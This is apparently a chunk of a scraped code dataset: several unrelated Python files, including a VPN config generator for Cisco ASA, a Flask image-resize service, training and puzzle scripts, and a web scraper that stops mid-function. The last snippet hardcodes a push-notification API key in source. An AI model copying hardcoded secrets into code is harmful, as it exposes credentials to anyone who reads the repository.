windowevaluate.update()\n\ndef createwindowevaluation(inputfile, outputfile):\n\n #creating the gui envoirnment for widgets\n\n\n global windowevaluate\n windowevaluate = tk.Tk()\n # windowtwo.geometry('800x800+200+0')\n windowevaluate.title(\"Smark Network Monitoring Tool\")\n\n 
homecanvas = tk.Canvas(windowevaluate, width=800, height=800)\n homecanvas.pack()\n\n headinglabel = Label(homecanvas, text=\"Smart Network Monitoring Tool\", fg='#0b0230', font=('helvetica', 25, 'bold'))\n homecanvas.create_window(400, 100, window=headinglabel)\n\n\n\n #creating the top part to get the attacker ip\n\n attackersiplabel = Label(homecanvas, text=\"Enter the Attackers IP for evaluation\", fg='black', font=('helvetica', 15, 'bold'))\n homecanvas.create_window(400, 170, window=attackersiplabel)\n\n inputboxip = tk.Entry(windowevaluate)\n homecanvas.create_window(300, 210, window=inputboxip)\n\n global startscanafteriprecievedbtn\n startscanafteriprecievedbtn = tk.Button(text='Start Scanning', command=lambda: gotostartevaluatingthread(inputboxip.get(), inputfile, outputfile), bg='light blue', fg='black', font=('helvetica', 12, 'bold'))\n homecanvas.create_window(500, 210, window=startscanafteriprecievedbtn)\n\n\n global quitevaluatebtn\n quitevaluatebtn = tk.Button(text='Quit Evaluate',\n command= quitandopenhomewindow,\n bg='red', fg='black', font=('helvetica', 12, 'bold'))\n homecanvas.create_window(400, 700, window=quitevaluatebtn)\n\n quitevaluatebtn[\"state\"] = \"disabled\"\n\n\n treeviewframe = LabelFrame(windowevaluate, text=\"Excel Data\")\n treeviewframe.place(height=330, width=400, rely=0.35, relx=0.25)\n\n global tv1\n tv1 = ttk.Treeview(treeviewframe)\n tv1.place(relheight=1, relwidth=1) # set the height and width of the widget to 100% o its container (frame1).\n\n # treescrolly = tk.Scrollbar(treeviewframe, orient=\"vertical\",\n # command=tv1.yview) # command means update the yaxis view of the widget\n # treescrollx = tk.Scrollbar(treeviewframe, orient=\"horizontal\",\n # command=tv1.xview) # command means update the xaxis view of the widget\n # tv1.configure(xscrollcommand=treescrollx.set,\n # yscrollcommand=treescrolly.set) # assign the scrollbars to the Treeview Widget\n # treescrollx.pack(side=\"bottom\", fill=\"x\") # make the scrollbar fill the x axis of the Treeview widget\n # treescrolly.pack(side=\"right\", fill=\"y\") # make the scrollbar fill the y axis of the Treeview widget\n\n listofcolumns = [\"Measure\", \"Measure Value\"]\n\n # tv1[\"column\"] = listofcolumns\n # tv1[\"show\"] = \"headings\"\n # tv1.heading(\"Measure\", text=\"Measure\")\n # tv1.heading(\"Measure Value\", text=\"Measure Value\")\n\n tv1[\"columns\"] = (\"one\")\n # tv1[\"show\"] = \"headings\"\n tv1.column('#0')\n tv1.column(\"one\", width=150)\n\n tv1.heading('#0', text=\"Measures\")\n tv1.heading(\"one\", text=\"Values\")\n\n tv1.insert(parent=\"\", index=\"end\", iid=0, text='Total Flows', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=1, text='Total Positive Flows', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=2, text='Total Negative Flows', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=3, text='True Positives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=4, text='True Negatives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=5, text='False Positives', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=6, text='False Negatives', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=7, text='Average Accuracy', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=8, text='Positive Class Accuracy', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=9, text='Negative Class Accuracy', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=10, text='Positive 
Class Precision', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=11, text='Negative Class Precision', values=(\"0\"))\n\n tv1.insert(parent=\"\", index=\"end\", iid=12, text='Positive Class Recall', values=(\"0\"))\n tv1.insert(parent=\"\", index=\"end\", iid=13, text='Negative Class Recall', values=(\"0\"))\n\n windowevaluate.mainloop()\n\n#createwindowevaluation(r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models\\2020-03-15_Flow.csv', r'D:\\Dropbox\\Dropbox\\P1 Research\\Pyhton Codes\\Test data and models')","repo_name":"adamisrail/FYP","sub_path":"WindowEvalWithTreeView.py","file_name":"WindowEvalWithTreeView.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38548825893","text":"#!/usr/bin/env python3\n# Import OS module to do things like execute commands directly to OS\nimport os\n# Load built-in or APT installed modules\nimport socket\nimport sys\nimport getpass\nimport pip\n# importlib lets us import modules by their string names below\nimport importlib\n# Load the netmiko module, which makes the magic happen\nfrom netmiko import ConnectHandler\n\nprint(\"L2L configuration generator\")\nprint(\" \")\nprint(\"Checking if we need to install any modules before running. Please wait...\")\nprint(\" \")\n\n\n# Install core modules to run\nprint(\"We will need to install some python packages/modules, if this is your \"\n \"first run\")\nprint('ensure your internet connection is working and be patient...')\n# Install packages via APT\nprint('Verifying module install via APT')\nos.system(\"/usr/bin/apt-get install -y python3 python3-pip python3-paramiko\")\n\n\n# Confirm if we have all python3 modules needed to run this\n# If modules are not found, install them via pip\npkgs = ['pprint', 'pyyaml', 'pyserial', 'textfsm', 'netmiko']\nfor package in pkgs:\n try:\n importlib.import_module(package)\n except ImportError:\n pip.main(['install', package])\n\n\nos.system(\"clear\")\nprint(\"Welcome to Tabajara L2L configuration generator\")\nprint(\" \")\n# Just a greeting to user\nprint(\"Now we are (hopefully) all set to start \")\n\n\n# Reads the user input to determine which type of configuration we need\n# If the ASA is 8.2 or earlier we use isakmp crypto, otherwise we use ike\nprint(\" \")\nprint(\"For which version of IOS are we building this config?\")\nprint(\"Is the ASA running 8.2 or earlier?\")\nprint(\" \")\nasaversion = input(\"Please enter 8.2 for any version below 8.3 or 8.3 for any\"\n \" other version: \")\n# Ask the user for the SSH port; if none is informed, use the default (22)\nprint(\" \")\nremoteport = int(input(\"Please inform the SSH port to connect to ASA. 
Just \"\n \"press enter if using the default port (22): \") or 22)\n\n# Different actions for different versions\nif asaversion == '8.2':\n print(\" \")\n print(\"ASA version 8.2 or earlier, generating \"\n \"configuration in ISAKMP mode\")\n print(\"------------------------\"\n \"-------------------------------------------\")\n hostname = input(\"Please inform the IP or hostname to connect: \")\n ssh_username = input(\"Please inform the username to be used to connect \"\n \"(make sure the user has privilege 15): \")\n ssh_password = getpass.getpass(\"Please inform the password to be used\"\n \" to connect: \")\n enable_secret = getpass.getpass(\"ASA in version 8.2 and below uses enable\"\n \" secret, please inform them now: \")\n print(\"-------------------------------------------------------------\"\n \"-----------\")\nelif asaversion == '8.3':\n print(\" \")\n print(\"ASA version 8.3 or superior, generating configuration in IKE mode\")\n print(\"-----------------------------------------------------------------\")\n hostname = input(\"Please inform the IP or hostname to connect: \")\n ssh_username = input(\"Please inform the username to be used to connect\"\n \" (make sure the user has privilege 15): \")\n ssh_password = getpass.getpass(\"Please inform the password to be used to\"\n \" connect and enable: \")\n # We dont really need this here, but netmiko refuses to work if dont get\n # enable superpowers, so, lets use the same variable for enable_secret\n enable_secret = ssh_password\n print(\"------------------------------------------------------------\")\nelse:\n print(\" \")\n print(\"Invalid input, program will exit now\")\n sys.exit()\n\n\n# Lets confirm the port is opened before do anything further\ndef isOpen(ip, port):\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('Verifying if host is listening on remote port '\n + str(remoteport) + ' ...')\n s.connect((ip, port))\n s.shutdown(2)\n print(\" \")\n print('Host is listening on remote port ' + str(remoteport) +\n '... 
proceeding')\n print(\" \")\n except socket.error:\n print(\" \")\n print('Host its not listening on indicated remote port '\n + str(remoteport) + ', program will exit now')\n sys.exit()\n\n\n# Execute the function to check if host is listening on indicated port\nisOpen(hostname, remoteport)\n\n\n# Lets define a ASA here, to be used be netmiko after\nasa_firewall = {\n 'device_type': 'cisco_asa',\n 'ip': hostname,\n 'username': ssh_username,\n 'password': ssh_password,\n 'port': remoteport,\n 'secret': enable_secret,\n 'verbose': False, # optional, defaults to False\n}\n\n\n# Connect to ASA using SSH, and stores the version of the box to be compared\n# We need this to ensure we will not break anything to user\ndef check_asaversion():\n client = ConnectHandler(**asa_firewall)\n # Stores entire 'show version' output into variable showversion\n showversion = client.send_command('show version')\n # Split the showversion variable to get only the major version/release\n showversion_split = str(showversion.split('\\n')[1]\n .split(' ')[-2].split('(')[0])\n return showversion_split\n\n\n# Lets put the ASA version here to compare in next section\nversion_running = check_asaversion()\n\n\n# Compare the user input with the version we got from device\nif version_running <= '8.2':\n if version_running <= '8.2':\n print(\" \")\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are compatible, proceeding...\")\n else:\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are not compatible to configure\")\n print(\"Please check your input and try again\")\n print(\"Exiting now...\")\n sys.exit()\nelif version_running >= '8.3':\n if version_running >= '8.3':\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are compatible, proceeding...\")\n else:\n print(\"You informed version \" + asaversion +\n \" when program started...\")\n print(\"Informed version \" + asaversion + \" and device version \"\n + version_running + \" are not compatible to configure\")\n print(\"Please check your input and try again\")\n print(\"Exiting now...\")\n sys.exit()\n\n# Lets start to collect information from the user, to build the configuration\n# to be applied into ASA further\ncompany01 = input(\"Enter abbreviated name of the company of this firewall: \")\ncompany02 = input(\"Enter abbreviated name of partner company where the \"\n \"connection will be made: \")\nprint(\"object-group network \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"w\"))\nprint(\"description Hosts/Networks to protect in \" + company01 + \" side\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\" \")\nprint(\"Please inform the hosts/networks to be added to VPN in \" + company01)\nprint(\"side, to specify hosts enter 255.255.255.255 as mask\")\nprint(\" \")\nprint(\"example: 192.168.1.234 255.255.255.255 for a host or\")\nprint(\"example: 192.168.1.0 255.255.255.0 for the entire\")\nprint(\"192.168.1 network\")\nprint(\" \")\nprint(\"Press Ctrl-D to save it.\")\nprotect_company01 = []\nwhile True:\n try:\n line = input()\n linecomplete = \"network-object {}\".format(line)\n protect_company01.append(linecomplete)\n except 
EOFError:\n break\n\narquivo = open('/tmp/temp_network-companies.txt', 'a')\nfor item in protect_company01:\n arquivo.write(\"%s\\n\" % item)\n\nprint(\"object-group network \" + company02 + \"-\" + company01,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\"description Hosts/Networks to protect in \" + company02 + \" side\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\nprint(\" \")\nprint(\"Please inform the hosts/networks to be added to VPN in \" + company02)\nprint(\"side, to specify hosts enter 255.255.255.255 as mask\")\nprint(\" \")\nprint(\"example: 192.168.1.234 255.255.255.255 for a host or\")\nprint(\"example: 192.168.1.0 255.255.255.0 for the entire\")\nprint(\"192.168.1 network\")\nprint(\" \")\nprint(\"Press Ctrl-D to save it.\")\nprotect_company02 = []\nwhile True:\n try:\n line = input()\n linecomplete = \"network-object {}\".format(line)\n protect_company02.append(linecomplete)\n except EOFError:\n break\n\narquivo = open('/tmp/temp_network-companies.txt', 'a')\nfor item in protect_company02:\n arquivo.write(\"%s\\n\" % item)\n\n# Lets build the default ACLs\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip \"\n \"any object-group \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip \"\n \"object-group \" + company01 + \"-\" + company02 + \"any\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip any4\"\n \" object-group \" + company01 + \"-\" + company02,\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\nprint(\"access-list \" + company01 + \"-\" + company02 + \"extended permit ip\"\n \" object-group \" + company01 + \"-\" + company02 + \"any4\",\n file=open(\"/tmp/temp_network-companies.txt\", \"a\"))\n\n'''access-list B2BSSIT-RABK extended permit ip any4 object-group B2BSSIT-RABK\naccess-list B2BSSIT-RABK extended permit ip object-group B2BSSIT-RABK any4\n\n# Define default variables for security association parameters\nlifetime_seconds = 28800\nlifetime_kilobytes = 4608000\n\n# Define dictionaries to read actual configuration and determine the\n# index of the new configuration\ncrypto_map_properties = { 'index': ' ', 'parameter': ' ',\n'property': ' ', 'value': '' }\ncrypto_policy = { 'index': ' ', 'authentication': ' ', 'encryption': ' ',\n'hash': ' ', 'group': ' ', 'lifetime': '' }\ngroup_policy = { 'name': ' ', 'protocol': ' ', 'peer_ip': '' }\ntunnel_group = { 'peer_ip': ' ', 'group_policy': ' ', 'psk': '' }\n\n# Start to fill the new configuration\ndef cypto-policy-conf {print 'crypto isakmp policy crypto_policy.index()','''\n","repo_name":"vakaobr/l2lvpngen","sub_path":"l2lvpngen.py","file_name":"l2lvpngen.py","file_ext":"py","file_size_in_byte":10474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"22018022699","text":"# coding: utf-8\n\nimport yaml\nfrom main import *\nfrom dataprovider import *\nfrom make_tfrecords import *\nimport arg_parse\n\n\ndef cfg_parse(args, cfg):\n args_dict = args.__dict__\n args_key_list = [key for key in args_dict]\n cfg_key_list = [key for key in cfg]\n\n # init None args with cfg values\n undefined_arg_key = filter(lambda x, args_dict=args_dict: args_dict[x] is None, args_key_list)\n undefined_arg_key = filter(lambda x: x in cfg_key_list, undefined_arg_key)\n for key_name in undefined_arg_key:\n 
args_dict[key_name] = cfg[key_name]\n\n # add args which are not included in args parser\n uncontained_arg_key = filter(lambda x: not (x in args_key_list), cfg_key_list)\n for key_name in uncontained_arg_key:\n args_dict[key_name] = cfg[key_name]\n\n return args\n\n\ndef main():\n args = arg_parse.get_arg()\n with open(args.cfg, 'r') as f:\n cfg = yaml.load(f)\n f.close()\n args = cfg_parse(args, cfg)\n if args.loss == 'cross_entropy_log_dice':\n loss_kwargs = {'alpha': args.alpha}\n else:\n loss_kwargs = {}\n\n data = [args.dataset1, args.dataset2, args.dataset3, args.dataset4]\n test_num = args.testset\n testset = data[test_num - 1]\n trainset = []\n for i in range(4):\n if i != test_num - 1:\n trainset += data[i]\n tfrecord_train = TFrecord_Create_For_Unet(train_test='train',\n dataset=trainset,\n img_folder=args.img_dir,\n label_names=args.label_names,\n img_type=args.img_type,\n tf_record_pre_fix=args.tf_record_prefix,\n nx=args.img_size[0],\n ny=args.img_size[1]\n )\n\n tfrecord_test = TFrecord_Create_For_Unet(train_test='test',\n dataset=testset,\n img_folder=args.img_dir,\n img_type=args.img_type,\n label_names=args.label_names,\n tf_record_pre_fix=args.tf_record_prefix,\n nx=args.img_size[0],\n ny=args.img_size[1]\n )\n train_size = tfrecord_train.image_count\n test_size = tfrecord_test.image_count\n training_iters = int(math.ceil(train_size / args.batch_size))\n\n # Set up Dataprovider\n data_provider = Tfrecord_ImageDataProvider(\n train_tfrecord_path=args.train_tfrecord_path,\n test_tfrecord_path=args.test_tfrecord_path,\n channels=args.channels, train_batch_size=args.batch_size, test_batch_size=1,\n nx=args.img_size[0], ny=args.img_size[1])\n\n # Training\n net = Network(net_type=args.net_type, loss=args.loss, layers=5, features_root=64, channels=args.channels,\n loss_kwargs=loss_kwargs)\n trainer = Trainer(net, data_provider=data_provider, batch_size=args.batch_size, validation_batch_size=1,\n optimizer=args.opt, lr=args.lr, nx=args.img_size[0], ny=args.img_size[1], opt_kwargs={})\n trainer.train(output_path=args.model_path, log_path=args.log_path, prediction_path=args.pred_path,\n training_iters=training_iters, epochs=args.n_epochs, test_size=test_size)\n _d, _i = trainer.test(model_path=args.model_path, data_provider=data_provider, test_size=test_size)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"troylujc/AttentionUnet","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"60"} +{"seq_id":"43224078338","text":"class Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n left, right = 0, (m*n)-1\n while left <= right:\n pivot = left + ((right-left)//2)\n mid = matrix[pivot//n][pivot%n]\n if target == mid:\n return True\n if target < mid:\n right = pivot - 1\n else:\n left = pivot + 1\n return False","repo_name":"thegeorgejoseph/hash-define-dsa","sub_path":"74-search-a-2d-matrix/74-search-a-2d-matrix.py","file_name":"74-search-a-2d-matrix.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74519343229","text":"from __future__ import annotations\nimport argparse\nfrom collections import Counter\nfrom pathlib import Path\nfrom typing import Optional, Union\n\nimport pytest\nfrom support import timing\n\nINPUT_TXT = Path(__file__).parent.joinpath(\"input.txt\")\n\n\ndef 
get_bracket_score(bracket: str) -> int:\n bracket_map = {\")\": 3, \"]\": 57, \"}\": 1197, \">\": 25137}\n return bracket_map.get(bracket)\n\n\ndef compute(s: Union[list[str], str], testing: Optional[bool] = None) -> int:\n lines = s if testing and isinstance(s, list) else s.splitlines()\n counter = Counter({\")\": 0, \"]\": 0, \"}\": 0, \">\": 0})\n forward_brackets = {\"(\": \")\", \"[\": \"]\", \"{\": \"}\", \"<\": \">\"}\n reversed_brackets = {v: k for k, v in forward_brackets.items()}\n\n for line in lines:\n bracket_stack = []\n for c in line:\n if c in forward_brackets:\n bracket_stack.append(c)\n elif c in reversed_brackets:\n if reversed_brackets[c] == bracket_stack[-1]:\n bracket_stack.pop()\n else:\n counter[c] += 1\n break\n\n return sum(v * get_bracket_score(k) for k, v in counter.items())\n\n\ndef test(input_data) -> None:\n assert compute(input_data, testing=True) == 26397\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n args = parser.parse_args()\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"cardonas/AdventOfCode","sub_path":"aoc2021/day10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26300298257","text":"from subprocess import call\nfrom sys import exit\nfrom platform import python_version, architecture\n\n\nclass system_check:\n # class-level constants so the methods below can reference them\n minimum_python_version = \"3.7.3\"\n minimum_distro_version = \"buster\"\n\n def apt_system_checks():\n call([\"sudo\", \"apt\", \"update\"])\n call([\"sudo\", \"apt\", \"upgrade\", \"-y\"])\n\n def rasp_os_ver():\n os_file = \"/etc/os-release\"\n with open(os_file, 'r') as f:\n data = f.read()\n data = data.splitlines()[4].split(\"=\")[1]\n if data != system_check.minimum_distro_version:\n f.close()\n exit(\"Unsupported Distro\")\n f.close()\n return True\n\n def platform_check():\n plat = architecture()\n if plat[0] != \"32bit\":\n exit(\"Invalid Arch\")\n return plat[0]\n\n def get_python_version():\n current_version = python_version()\n if current_version < system_check.minimum_python_version:\n exit(\"Your Python Version is too low\")\n return current_version\n\n def install_required_pip_packages():\n call([\"pip\", \"install\", \"--upgrade\", \"pip\",\n \"systemtools\", \"disttools\", \"wheel\"])\n with open('/home/pi/menu_project/requirements.txt', 'r') as f:\n for line in f:\n data = line.strip(\"\\n\").split()[0]\n call([\"pip\", \"install\", data])\n f.close()\n exit(0)\n","repo_name":"rocksinboxes/menu_project","sub_path":"system_checks.py","file_name":"system_checks.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40815325909","text":"\"\"\"add assertion type for strict and warning checks. 
Strict is pass/fail, warning is for less important discrepancies\n\nRevision ID: b8670422db69\nRevises: c6e76ab376a8\nCreate Date: 2022-05-12 10:09:10.997732\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects import postgresql\n\nfrom application.models import AssertionType\n\nrevision = \"b8670422db69\"\ndown_revision = \"c6e76ab376a8\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n assertion_type = postgresql.ENUM(AssertionType, name=\"assertion_type\")\n assertion_type.create(op.get_bind(), checkfirst=True)\n op.add_column(\n \"assertion\",\n sa.Column(\n \"assertion_type\", sa.Enum(\"strict\", \"warning\", name=\"assertion_type\")\n ),\n )\n op.execute(\"UPDATE assertion SET assertion_type = 'strict'\")\n op.alter_column(\"assertion\", \"assertion_type\", nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"assertion\", \"assertion_type\")\n # ### end Alembic commands ###\n","repo_name":"digital-land/performance-prototype","sub_path":"migrations/versions/b8670422db69_add_assertion_type_for_strict_and_.py","file_name":"b8670422db69_add_assertion_type_for_strict_and_.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17309242420","text":"import os\nimport subprocess\nimport requests\nfrom flask import Flask, request, send_file\nimport uuid\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = '/tmp/images'\n\n\n@app.route('/resize', methods=['POST'])\ndef resize():\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file = request.files['file']\n size = request.values['size']\n if file:\n extension = os.path.splitext(file.filename)[1]\n path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4()))\n file.save(path + extension)\n resized = resizeCmd(path, extension, size)\n return send_file(resized)\n\n@app.route('/resize/percent', methods=['POST'])\ndef resizePercent():\n if not os.path.exists(app.config['UPLOAD_FOLDER']):\n os.makedirs(app.config['UPLOAD_FOLDER'])\n file = request.files['file']\n percent = request.values['percent']\n if file:\n extension = os.path.splitext(file.filename)[1]\n path = os.path.join(app.config['UPLOAD_FOLDER'], str(uuid.uuid4()))\n file.save(path + extension)\n url = 'http://exifdata:8082/exifdata/filtered'\n files = {'file': open(path+extension, 'rb')}\n\n r = requests.post(url, files=files, data={'filter': 'Image Height'})\n\n percentSize = float(str(r.text).split(':')[1].strip()) * (float(percent) / 100)\n\n resized = resizeCmd(path, extension, str(percentSize)+'x'+str(percentSize))\n return send_file(resized, mimetype=\"image/*\")\n\n\n\ndef resizeCmd(path, extension, size):\n newFileName = path + \"_resized\" + extension\n subprocess.call(('convert', path + extension,\"-resize\", size, newFileName))\n return newFileName;\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"thomasiffland/master-project-python","sub_path":"resize/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32101662549","text":"class Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n 
ret = dict()\n\n # use key as a sorted chars\n # use value as a element of strs array\n for item in strs:\n words = [c for c in item]\n words.sort()\n words = tuple(words)\n\n if words not in ret:\n ret[words] = []\n ret[words].append(item)\n\n ans = []\n for key in ret.keys():\n ans.append(ret[key])\n return ans","repo_name":"LONGNEW/Problem_Solving","sub_path":"leetcode/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31854166480","text":"import os, numpy\nfrom optparse import OptionParser\n\nfrom flydra_db import FlydraDB\nfrom geometric_saccade_detector.io import saccades_read_mat\n\nfrom .constants import SACCADES_TABLE\n\ndescription = \"Imports the saccade data from Andrea's Matlab files to FlydraDB.\"\n \ndef main():\n parser = OptionParser(usage=description)\n parser.add_option(\"--saccade_data\", help=\"Main data directory\",\n default='saccade_data')\n parser.add_option(\"--db\", help=\"FlydraDB directory\")\n \n parser.add_option(\"--verbose\", help='Verbose output',\n default=False, action=\"store_true\")\n \n (options, args) = parser.parse_args() #@UnusedVariable\n \n if not options.db:\n raise Exception('Please define FlydraDB directory using `--db`.')\n \n def printv(s):\n if options.verbose:\n print(s)\n \n flydra_db = FlydraDB(options.db, create=True)\n \n matlab_dir = options.saccade_data\n for group in os.listdir(matlab_dir):\n group_dir = os.path.join(matlab_dir, group)\n if not os.path.isdir(group_dir): \n continue\n \n printv(\"Opening {0}\".format(group))\n \n# \n# \n# exp_data, attributes = read_raw_data(filename)\n# \n# consider_importing_processed(flydra_db, sample, exp_data, attributes)\n# \n# flydra_db.set_attr(sample, 'species', attributes['species'])\n# flydra_db.set_attr(sample, 'background', attributes['background'])\n# \n# flydra_db.set_table(sample, EXP_DATA_TABLE, exp_data)\n# flydra_db.add_sample_to_group(sample, group)\n# flydra_db.add_sample_to_group(sample, 'ros')\n# \n \n processed_dir = os.path.join(group_dir, 'processed')\n \n if not os.path.exists(processed_dir):\n printv(\"No processed data found for group %r.\" % group)\n continue\n \n for conf in os.listdir(processed_dir):\n # first look for saccades.mat\n saccades_file = os.path.join(processed_dir, conf, 'saccades.mat')\n if os.path.exists(saccades_file):\n printv('Loading from file %r.' 
% saccades_file)\n saccades = saccades_read_mat(saccades_file)\n samples = numpy.unique(saccades['sample'])\n for sample in samples:\n if not flydra_db.has_sample(sample):\n flydra_db.add_sample(sample)\n flydra_db.add_sample_to_group(sample, group)\n sample_saccades = saccades[saccades[:]['sample'] == sample]\n flydra_db.set_table(sample=sample, table=SACCADES_TABLE,\n version=conf, data=sample_saccades)\n# else:\n# prefix = 'data_'\n# suffix = '.mat'\n# for file in [file for file in os.listdir(group_dir) \n# if (file.startswith(prefix)) and file.endswith(suffix)]:\n# \n# sample = file[len(prefix):file.index('.')]\n# \n# if verbose:\n# print(\" - Considering sample {0}\".format(sample.__repr__()))\n# \n# if not flydra_db.has_sample(sample):\n# flydra_db.add_sample(sample)\n# \n# filename = os.path.join(group_dir, file)\n# \n# \n# \n# else:\n# for conf in os.listdir(processed_dir): \n# saccades = os.path.join(processed_dir, conf, 'saccades.mat')\n# if os.path.exists(saccades): \n# group_record.configurations[conf] = saccades\n# # add to general list\n# self.configurations.add(conf)\n## else:\n## conf_dir = os.path.join(processed_dir, conf)\n## for file in [file for file in os.listdir(conf_dir) \n## if file.startswith('processed_data_') and file.endswith('.mat')]: \n## id = file[5:-7]\n#\n# # if we don't have exp data, get list of samples from\n# # processed data\n# if group_record.configurations and \\\n# not group_record.has_experimental_data:\n# saccades = saccades_read_mat(saccades)\n# group_record.samples = set(numpy.unique(saccades['sample']))\n# for sample in group_record.samples:\n# self.sample2group[sample] = group\n#\n# if len(group_record.samples)> 0:\n# self.groups[group] = group_record\n# \n# print \"has it\", group, group_record.has_experimental_data\n# \n flydra_db.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AndreaCensi/saccade_analysis","sub_path":"src-python/saccade_analysis/import_matlab_andrea.py","file_name":"import_matlab_andrea.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"73479354430","text":"from .Simple import Simple\nfrom .. 
import helper\n\n\nclass SimpleWithInfo(Simple):\n def decode_object(self, src_dir, file_name, dest_dir, dest_path, version, header_data):\n super(Simple, self).decode_object(src_dir, file_name, dest_dir, dest_path, version, header_data)\n try:\n self.header['info'] = helper.brace_file_read(src_dir, f'{self.header[\"uuid\"]}.0')\n except FileNotFoundError:\n return\n\n def write_encode_object(self, dest_dir):\n super(Simple, self).write_encode_object(dest_dir)\n info = self.header.get('info')\n if info:\n file_name = f'{self.header[\"uuid\"]}.0'\n helper.brace_file_write(info, dest_dir, file_name)\n self.file_list.append(file_name)\n","repo_name":"saby-integration/v8unpack","sub_path":"src/v8unpack/MetaDataObject/core/SimpleWithInfo.py","file_name":"SimpleWithInfo.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"659896134","text":"import requests\nimport bs4\n\nbark_key = \"HaNJZPZJyMpSoNp2QLnrM8\"\n\ndef get_tag_notice():\n url = 'https://note.boccc.co/'\n r = requests.get(url)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n contents = soup.find('div', id='posts-wrapper')\n contents = contents.find_all('div', class_='post')\n return contents\n\n\ndef handle_tag_notice(contents):\n tag_notices = []\n for content in contents:\n tag_notice = {}\n notice_type = content.find('h1', class_='entry-title').text.replace('#', '')\n #
<div class="date"><p><span class="day">03</span>3월 / 2023</p></div>
